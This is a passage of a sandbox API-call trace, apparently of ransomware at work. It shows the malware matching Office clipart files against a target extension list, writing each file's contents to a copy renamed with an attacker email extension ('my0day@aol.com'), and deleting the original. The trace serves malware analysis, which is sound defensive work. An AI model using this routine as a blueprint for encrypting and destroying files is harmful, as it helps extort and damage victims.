lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.321] SetEndOfFile (hFile=0x300) returned 1 [0269.363] CloseHandle (hObject=0x300) returned 1 [0269.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.364] lstrlenW (lpString=".doc") returned 4 [0269.364] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".docx") returned 5 [0269.364] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.364] lstrlenW (lpString=".pdf") returned 4 [0269.364] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".xls") returned 4 [0269.364] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.364] lstrlenW (lpString=".xlsx") returned 5 [0269.364] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.364] lstrlenW (lpString=".ppt") returned 4 [0269.364] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.364] lstrlenW (lpString=".zip") returned 4 [0269.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.364] lstrlenW (lpString=".rar") returned 4 [0269.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".bz2") returned 4 [0269.364] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.364] lstrlenW (lpString=".7z") returned 3 [0269.364] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.364] lstrlenW (lpString=".dbf") returned 4 [0269.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString=".1cd") returned 4 [0269.365] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString=".jpg") returned 4 [0269.365] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString=".doc") returned 4 [0269.365] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString=".docx") returned 5 [0269.365] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.365] lstrlenW (lpString=".pdf") returned 4 [0269.365] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString=".xls") returned 4 [0269.365] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.365] lstrlenW (lpString=".xlsx") returned 5 [0269.365] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.365] lstrlenW (lpString=".ppt") returned 4 [0269.365] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString=".zip") returned 4 [0269.365] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.365] lstrlenW (lpString=".rar") returned 4 [0269.365] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString=".bz2") returned 4 [0269.365] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.365] lstrlenW (lpString=".7z") returned 3 [0269.365] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.365] lstrlenW (lpString=".dbf") returned 4 [0269.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.366] lstrlenW (lpString=".1cd") returned 4 [0269.366] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0269.366] lstrlenW (lpString=".jpg") returned 4 [0269.366] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.366] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.366] lstrlenW (lpString="BL00262_.WMF") returned 12 [0269.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.380] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2556) returned 1 [0269.380] CloseHandle (hObject=0x2c4) returned 1 [0269.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 0x20 [0269.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.381] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.381] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.382] GetLastError () returned 0x0 [0269.382] ReadFile (in: hFile=0x2c4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x9fc, lpOverlapped=0x0) returned 1 [0269.384] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0269.385] ReadFile (in: hFile=0x2c4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.385] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.385] SetEndOfFile (hFile=0x318) returned 1 [0269.385] CloseHandle (hObject=0x318) returned 1 [0269.385] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.385] SetEndOfFile (hFile=0x2c4) returned 1 [0269.388] CloseHandle (hObject=0x2c4) returned 1 [0269.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.389] lstrlenW (lpString=".doc") returned 4 [0269.389] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString=".docx") returned 5 [0269.389] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.389] lstrlenW (lpString=".pdf") returned 4 [0269.389] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString=".xls") returned 4 [0269.389] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.389] lstrlenW (lpString=".xlsx") returned 5 [0269.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.389] lstrlenW (lpString=".ppt") returned 4 [0269.389] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.389] lstrlenW (lpString=".zip") returned 4 [0269.389] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.389] lstrlenW (lpString=".rar") returned 4 [0269.389] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString=".bz2") returned 4 [0269.389] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString=".7z") returned 3 [0269.389] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.389] lstrlenW (lpString=".dbf") returned 4 [0269.389] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.389] lstrlenW (lpString=".1cd") returned 4 [0269.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".jpg") returned 4 [0269.390] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".doc") returned 4 [0269.390] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString=".docx") returned 5 [0269.390] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.390] lstrlenW (lpString=".pdf") returned 4 [0269.390] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString=".xls") returned 4 [0269.390] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.390] lstrlenW (lpString=".xlsx") returned 5 [0269.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.390] lstrlenW (lpString=".ppt") returned 4 [0269.390] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".zip") returned 4 [0269.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.390] lstrlenW (lpString=".rar") returned 4 [0269.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString=".bz2") returned 4 [0269.390] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString=".7z") returned 3 [0269.390] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".dbf") returned 4 [0269.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".1cd") returned 4 [0269.390] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0269.390] lstrlenW (lpString=".jpg") returned 4 [0269.391] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.391] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.391] lstrlenW (lpString="BL00265_.WMF") returned 12 [0269.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.391] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=5752) returned 1 [0269.391] CloseHandle (hObject=0x2c4) returned 1 [0269.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 0x20 [0269.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.392] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.392] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.560] GetLastError () returned 0x0 [0269.560] ReadFile (in: hFile=0x2c4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x1678, lpOverlapped=0x0) returned 1 [0269.565] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x1680, lpOverlapped=0x0) returned 1 [0269.567] ReadFile (in: hFile=0x2c4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.567] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.567] SetEndOfFile (hFile=0x380) returned 1 [0269.571] CloseHandle (hObject=0x380) returned 1 [0269.571] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.571] SetEndOfFile (hFile=0x2c4) returned 1 [0269.574] CloseHandle (hObject=0x2c4) returned 1 [0269.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0269.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".doc") returned 4 [0269.731] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString=".docx") returned 5 [0269.731] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.731] lstrlenW (lpString=".pdf") returned 4 [0269.731] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString=".xls") returned 4 [0269.731] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.731] lstrlenW (lpString=".xlsx") returned 5 [0269.731] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.731] lstrlenW (lpString=".ppt") returned 4 [0269.731] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".zip") returned 4 [0269.731] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.731] lstrlenW (lpString=".rar") returned 4 [0269.731] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString=".bz2") returned 4 [0269.731] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString=".7z") returned 3 [0269.731] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".dbf") returned 4 [0269.731] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".1cd") returned 4 [0269.731] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".jpg") returned 4 [0269.731] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.731] lstrlenW (lpString=".doc") returned 4 [0269.731] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString=".docx") returned 5 [0269.732] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.732] lstrlenW (lpString=".pdf") returned 4 [0269.732] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString=".xls") returned 4 [0269.732] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.732] lstrlenW (lpString=".xlsx") returned 5 [0269.732] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.732] lstrlenW (lpString=".ppt") returned 4 [0269.732] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.732] lstrlenW (lpString=".zip") returned 4 [0269.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.732] lstrlenW (lpString=".rar") returned 4 [0269.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString=".bz2") returned 4 [0269.732] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString=".7z") returned 3 [0269.732] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.732] lstrlenW (lpString=".dbf") returned 4 [0269.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.732] lstrlenW (lpString=".1cd") returned 4 [0269.732] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0269.732] lstrlenW (lpString=".jpg") returned 4 [0269.732] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.733] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.733] lstrlenW (lpString="BL00392_.WMF") returned 12 [0269.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.734] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=27050) returned 1 [0269.734] CloseHandle (hObject=0x384) returned 1 [0269.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 0x20 [0269.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.734] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.734] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.735] GetLastError () returned 0x0 [0269.735] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x69aa, lpOverlapped=0x0) returned 1 [0269.737] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x69b0, lpOverlapped=0x0) returned 1 [0269.738] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.739] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.739] SetEndOfFile (hFile=0x390) returned 1 [0269.739] CloseHandle (hObject=0x390) returned 1 [0269.739] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.739] SetEndOfFile (hFile=0x384) returned 1 [0269.744] CloseHandle (hObject=0x384) returned 1 [0269.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.745] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0269.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0269.745] lstrlenW (lpString="C:\\Program Files\\Microsoft 